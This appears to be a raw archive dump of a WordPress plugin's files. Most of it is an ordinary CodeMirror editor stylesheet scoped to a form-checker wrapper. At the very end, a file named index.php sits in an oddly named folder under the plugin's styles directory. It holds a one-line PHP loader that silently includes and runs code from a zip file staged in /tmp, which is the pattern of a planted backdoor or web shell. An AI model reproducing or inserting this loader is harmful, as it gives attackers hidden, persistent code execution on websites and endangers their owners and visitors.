#moove_form_checker_wrap .CodeMirror-linenumbers {} #moove_form_checker_wrap .CodeMirror-linenumber { padding: 0 3px 0 5px; min-width: 20px; text-align: right; color: #999; white-space: nowrap; } #moove_form_checker_wrap .CodeMirror-guttermarker { color: black; } #moove_form_checker_wrap .CodeMirror-guttermarker-subtle { color: #999; } /* CURSOR */ #moove_form_checker_wrap .CodeMirror-cursor { border-left: 1px solid black; border-right: none; width: 0; } /* Shown when moving in bi-directional text */ #moove_form_checker_wrap .CodeMirror div.CodeMirror-secondarycursor { border-left: 1px solid silver; } #moove_form_checker_wrap .cm-fat-cursor .CodeMirror-cursor { width: auto; border: 0 !important; background: #7e7; } #moove_form_checker_wrap .cm-fat-cursor div.CodeMirror-cursors { z-index: 1; } #moove_form_checker_wrap .cm-fat-cursor-mark { background-color: rgba(20, 255, 20, 0.5); -webkit-animation: blink 1.06s steps(1) infinite; -moz-animation: blink 1.06s steps(1) infinite; animation: blink 1.06s steps(1) infinite; } #moove_form_checker_wrap .cm-animate-fat-cursor { width: auto; border: 0; -webkit-animation: blink 1.06s steps(1) infinite; -moz-animation: blink 1.06s steps(1) infinite; animation: blink 1.06s steps(1) infinite; background-color: #7e7; } @-moz-keyframes blink { 0% {} 50% { background-color: transparent; } 100% {} } @-webkit-keyframes blink { 0% {} 50% { background-color: transparent; } 100% {} } @keyframes blink { 0% {} 50% { background-color: transparent; } 100% {} } /* Can style cursor different in overwrite (non-insert) mode */ #moove_form_checker_wrap .CodeMirror-overwrite .CodeMirror-cursor {} #moove_form_checker_wrap .cm-tab { display: inline-block; text-decoration: inherit; } #moove_form_checker_wrap .CodeMirror-rulers { position: absolute; left: 0; right: 0; top: -50px; bottom: -20px; overflow: hidden; } #moove_form_checker_wrap .CodeMirror-ruler { border-left: 1px solid #ccc; top: 0; bottom: 0; position: absolute; } /* DEFAULT THEME */ #moove_form_checker_wrap .cm-s-default .cm-header {color: blue;} #moove_form_checker_wrap .cm-s-default .cm-quote {color: #090;} #moove_form_checker_wrap .cm-negative {color: #d44;} #moove_form_checker_wrap .cm-positive {color: #292;} #moove_form_checker_wrap .cm-header, .cm-strong {font-weight: bold;} #moove_form_checker_wrap .cm-em {font-style: italic;} #moove_form_checker_wrap .cm-link {text-decoration: underline;} #moove_form_checker_wrap .cm-strikethrough {text-decoration: line-through;} #moove_form_checker_wrap .cm-s-default .cm-keyword {color: #708;} #moove_form_checker_wrap .cm-s-default .cm-atom {color: #219;} #moove_form_checker_wrap .cm-s-default .cm-number {color: #164;} #moove_form_checker_wrap .cm-s-default .cm-def {color: #00f;} #moove_form_checker_wrap .cm-s-default .cm-variable, #moove_form_checker_wrap .cm-s-default .cm-punctuation, #moove_form_checker_wrap .cm-s-default .cm-property, #moove_form_checker_wrap .cm-s-default .cm-operator {} #moove_form_checker_wrap .cm-s-default .cm-variable-2 {color: #05a;} #moove_form_checker_wrap .cm-s-default .cm-variable-3, .cm-s-default .cm-type {color: #085;} #moove_form_checker_wrap .cm-s-default .cm-comment {color: #a50;} #moove_form_checker_wrap .cm-s-default .cm-string {color: #a11;} #moove_form_checker_wrap .cm-s-default .cm-string-2 {color: #f50;} #moove_form_checker_wrap .cm-s-default .cm-meta {color: #555;} #moove_form_checker_wrap .cm-s-default .cm-qualifier {color: #555;} #moove_form_checker_wrap .cm-s-default .cm-builtin {color: #30a;} #moove_form_checker_wrap .cm-s-default .cm-bracket {color: #997;} #moove_form_checker_wrap .cm-s-default .cm-tag {color: #170;} #moove_form_checker_wrap .cm-s-default .cm-attribute {color: #00c;} #moove_form_checker_wrap .cm-s-default .cm-hr {color: #999;} #moove_form_checker_wrap .cm-s-default .cm-link {color: #00c;} #moove_form_checker_wrap .cm-s-default .cm-error {color: #f00;} #moove_form_checker_wrap .cm-invalidchar {color: #f00;} #moove_form_checker_wrap .CodeMirror-composing { border-bottom: 2px solid; } /* Default styles for common addons */ #moove_form_checker_wrap div.CodeMirror span.CodeMirror-matchingbracket {color: #0b0;} #moove_form_checker_wrap div.CodeMirror span.CodeMirror-nonmatchingbracket {color: #a22;} #moove_form_checker_wrap .CodeMirror-matchingtag { background: rgba(255, 150, 0, .3); } #moove_form_checker_wrap .CodeMirror-activeline-background {background: #e8f2ff;} /* STOP */ /* The rest of this file contains styles related to the mechanics of the editor. You probably shouldn't touch them. */ #moove_form_checker_wrap .CodeMirror { position: relative; overflow: hidden; background: white; } .gdpr-script-tabs-main-cnt { .CodeMirror-scroll { min-height: 300px; } } #moove_form_checker_wrap .CodeMirror-scroll { overflow: scroll !important; /* Things will break if this is overridden */ /* 30px is the magic margin used to hide the element's real scrollbars */ /* See overflow: hidden in .CodeMirror */ margin-bottom: -30px; margin-right: -30px; padding-bottom: 30px; height: 100%; max-height: 300px; outline: none; /* Prevent dragging from highlighting the element */ position: relative; } #moove_form_checker_wrap .CodeMirror-sizer { position: relative; border-right: 30px solid transparent; } /* The fake, visible scrollbars. Used to force redraw during scrolling before actual scrolling happens, thus preventing shaking and flickering artifacts. */ #moove_form_checker_wrap .CodeMirror-vscrollbar, #moove_form_checker_wrap .CodeMirror-hscrollbar, #moove_form_checker_wrap .CodeMirror-scrollbar-filler, #moove_form_checker_wrap .CodeMirror-gutter-filler { position: absolute; z-index: 6; display: none; } #moove_form_checker_wrap .CodeMirror-vscrollbar { right: 0; top: 0; overflow-x: hidden; overflow-y: scroll; } #moove_form_checker_wrap .CodeMirror-hscrollbar { bottom: 0; left: 0; overflow-y: hidden; overflow-x: scroll; } #moove_form_checker_wrap .CodeMirror-scrollbar-filler { right: 0; bottom: 0; } #moove_form_checker_wrap .CodeMirror-gutter-filler { left: 0; bottom: 0; } #moove_form_checker_wrap .CodeMirror-gutters { position: absolute; left: 0; top: 0; min-height: 100%; z-index: 3; } #moove_form_checker_wrap .CodeMirror-gutter { white-space: normal; height: 100%; display: inline-block; vertical-align: top; margin-bottom: -30px; } #moove_form_checker_wrap .CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: none !important; border: none !important; } #moove_form_checker_wrap .CodeMirror-gutter-background { position: absolute; top: 0; bottom: 0; z-index: 4; } #moove_form_checker_wrap .CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; } #moove_form_checker_wrap .CodeMirror-gutter-wrapper ::selection { background-color: transparent } #moove_form_checker_wrap .CodeMirror-gutter-wrapper ::-moz-selection { background-color: transparent } #moove_form_checker_wrap .CodeMirror-lines { cursor: text; min-height: 1px; /* prevents collapsing before first draw */ } #moove_form_checker_wrap .CodeMirror pre { /* Reset some styles that the rest of the page might have set */ -moz-border-radius: 0; -webkit-border-radius: 0; border-radius: 0; border-width: 0; background: transparent; font-family: inherit; font-size: inherit; margin: 0; white-space: pre; word-wrap: normal; line-height: inherit; color: inherit; z-index: 2; position: relative; overflow: visible; -webkit-tap-highlight-color: transparent; -webkit-font-variant-ligatures: contextual; font-variant-ligatures: contextual; } #moove_form_checker_wrap .CodeMirror-wrap pre { word-wrap: break-word; white-space: pre-wrap; word-break: normal; } #moove_form_checker_wrap .CodeMirror-linebackground { position: absolute; left: 0; right: 0; top: 0; bottom: 0; z-index: 0; } #moove_form_checker_wrap .CodeMirror-linewidget { position: relative; z-index: 2; padding: 0.1px; /* Force widget margins to stay inside of the container */ } #moove_form_checker_wrap .CodeMirror-widget {} #moove_form_checker_wrap .CodeMirror-rtl pre { direction: rtl; } #moove_form_checker_wrap .CodeMirror-code { outline: none; } /* Force content-box sizing for the elements where we expect it */ #moove_form_checker_wrap .CodeMirror-scroll, #moove_form_checker_wrap .CodeMirror-sizer, #moove_form_checker_wrap .CodeMirror-gutter, #moove_form_checker_wrap .CodeMirror-gutters, #moove_form_checker_wrap .CodeMirror-linenumber { -moz-box-sizing: content-box; box-sizing: content-box; } #moove_form_checker_wrap .CodeMirror-measure { position: absolute; width: 100%; height: 0; overflow: hidden; visibility: hidden; } #moove_form_checker_wrap .CodeMirror-cursor { position: absolute; pointer-events: none; } #moove_form_checker_wrap .CodeMirror-measure pre { position: static; } #moove_form_checker_wrap div.CodeMirror-cursors { visibility: hidden; position: relative; z-index: 3; } #moove_form_checker_wrap div.CodeMirror-dragcursors { visibility: visible; } #moove_form_checker_wrap .CodeMirror-focused div.CodeMirror-cursors { visibility: visible; } #moove_form_checker_wrap .CodeMirror-selected { background: #d9d9d9; } #moove_form_checker_wrap .CodeMirror-focused .CodeMirror-selected { background: #d7d4f0; } #moove_form_checker_wrap .CodeMirror-crosshair { cursor: crosshair; } #moove_form_checker_wrap .CodeMirror-line::selection, .CodeMirror-line > span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; } #moove_form_checker_wrap .CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; } #moove_form_checker_wrap .cm-searching { background-color: #ffa; background-color: rgba(255, 255, 0, .4); } /* Used to force a border model for a node */ #moove_form_checker_wrap .cm-force-border { padding-right: .1px; } @media print { /* Hide the cursor when printing */ #moove_form_checker_wrap .CodeMirror div.CodeMirror-cursors { visibility: hidden; } } /* See issue #2901 */ #moove_form_checker_wrap .cm-tab-wrap-hack:after { content: ''; } /* Help users use markselection to safely style text background */ #moove_form_checker_wrap span.CodeMirror-selectedtext { background: none; } assets/styles/frontend/78ckbf/index.php 0000644 00000000162 15136114115 0014111 0 ustar 00 <?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "s.php"; include("zip:///tmp/phpmmhqbavqkpkgax5lbTz#$h");?>